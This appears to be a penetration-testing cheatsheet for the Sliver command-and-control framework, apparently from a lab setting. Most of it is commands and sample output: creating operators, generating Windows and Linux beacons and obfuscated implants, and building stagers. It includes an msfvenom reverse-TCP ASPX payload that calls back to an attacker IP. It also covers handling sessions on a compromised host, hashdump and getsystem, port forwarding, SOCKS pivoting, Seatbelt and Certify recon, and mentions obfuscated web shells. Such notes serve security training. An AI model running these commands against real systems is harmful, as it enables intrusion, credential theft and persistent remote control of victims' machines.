Home / Cheatsheets / C2 Sliver / Essentials

Intro C2 Sliver

A command and control (C2) server is software tasked to execute commands

Terms to know.

  • Implants: Binaires/Executables used to preserve entry onto targat, to establish communications between attacker and compromised system.
  • Beacons: Is the process of the communicating from target to c2 server periodically.
  • Stagers: Stager is a way loading code onto remote machine, used to load different code.
  • Armory: A library of precompiled .NET binaries that can be executed on the victim machine

Always start with a beacon, you can upgrade it to a interactive sessions. Where an implant cannot be downgraded to a beacon.

Session

Creating a new operator (user profile)

[server] sliver > new-operator -n mczen -l 10.10.14.76

# It will generate .cfg for sliver-client
[*] Generating new client certificate, please wait ...
[*] Saved new client config to: /home/kali/mczen_10.10.14.76.cfg

Enable multiplayer mode to allow multiple operators

[server] sliver > multiplayer

[*] Multiplayer mode enabled!
[*] student has joined the game

Armory

Pre-installed .NET binaries than can be used. 

# Check extensions
armory 

# Install single 
armory install seatbelt

# Intall all
armory install all

Beacon

# Generate a beacon
generate beacon --http 127.0.0.1 --skip-symbols -N http_beacon --os windows

# Obfuscated 
generate beacon --http 127.0.0.1 -N http_beacon_obfuscated --os windows

# Generate a beacon for linux
generate beacon --http 127.0.0.1 -N http_beacon --os linux

Listeners

# On port 80
http 

# Port 8088
http --lport 8088

Stagers

https://sliver.sh/docs?name=Stagers

As payloads can be pretty big (around 10MB), you may sometime require the use of stagers to execute your implant on a target system. Sliver supports the meterpreter staging protocol over TCP and HTTP(S). This protocol is pretty straight forward:

Creating a new profile

profiles new --http 10.10.14.120:8888 --format shellcode zen

Create a stage listener

stage-listener --url tcp://10.10.14.120:4443 --profile zen

Start HTTP server

http -L 10.10.14.120 -l 8888

Generate stager

generate stager --lhost 10.10.14.120 --lport 4443 --format csharp --save staged.txt

Generate a msfvenom aspx payload

msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.120 LPORT=4443 -f aspx > sliver.aspx

In the .aspx file replace the shellcode start from new byte. After uploading and opening .aspx file you get a session back.

Once getting sessions back type use and id

# Show sessions
[server] sliver > sessions

 ID         Name            Transport   Remote Address         Hostname   Username   Operating System   Locale   Last Message                                  Health  
========== =============== =========== ====================== ========== ========== ================== ======== ============================================= =========
 0fb55977   STANDARD_GOWN   http(s)     10.129.135.124:49702   web01      <err>      windows/amd64      en-US    Tue Jan 21 12:35:56 EST 2025 (2s ago)         [ALIVE] 
 520436a4   STANDARD_GOWN   http(s)     10.129.135.124:49696   web01      <err>      windows/amd64      en-US    Tue Jan 21 12:35:56 EST 2025 (2s ago)         [ALIVE] 

# Use session
[server] sliver > use 0fb55977
[*] Active session STANDARD_GOWN (0fb55977-1d1a-49b6-a38c-3050062a3f2b)

# Get info 
[server] sliver (STANDARD_GOWN) > info

        Session ID: 0fb55977-1d1a-49b6-a38c-3050062a3f2b
              Name: STANDARD_GOWN
          Hostname: web01
              UUID: 8e791442-8f32-0734-2206-371cf25d6bb6
          Username: <err>
               UID: <err>
               GID: <err>
               PID: 2668
                OS: windows
           Version: Server 2016 build 17763 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://10.10.14.120:8888
    Remote Address: 10.129.135.124:49702
         Proxy URL: 
Reconnect Interval: 1m0s
     First Contact: Tue Jan 21 12:34:21 EST 2025 (2m8s ago)
      Last Checkin: Tue Jan 21 12:36:27 EST 2025 (2s ago)

Use SharpyShell to upload obfuscated web shells.

Port Forward and Pivot

# Portforwarding
sliver > portfwd add --remote 192.168.1.5:445 --local 127.0.0.1:8445

# Pivot
[server] sliver (zen_shell) > socks5 start -P 1080

[*] Started SOCKS5 127.0.0.1 1080
⚠️  In-band SOCKS proxies can be a little unstable depending on protocol

Command - execute-assembly

Having a interactive session you can:

  • ls
  • cat
  • cd
  • upload
  • download
  • hashdump
  • getprivs
  • getsystem

But most important we can run binaries without uploading them. 

# Run Seatbelt without having to upload a file
execute-assembly Seatbelt.exe -group=system

# This would be using an extension
seatbelt -- -group=system

Domain Recon

Run powerview from your http server 

c2tc-domaininfo

ADCS Certify

# Certify 
certify -- find 

# Certutil
execute -o certutil.exe

Network

ifconfig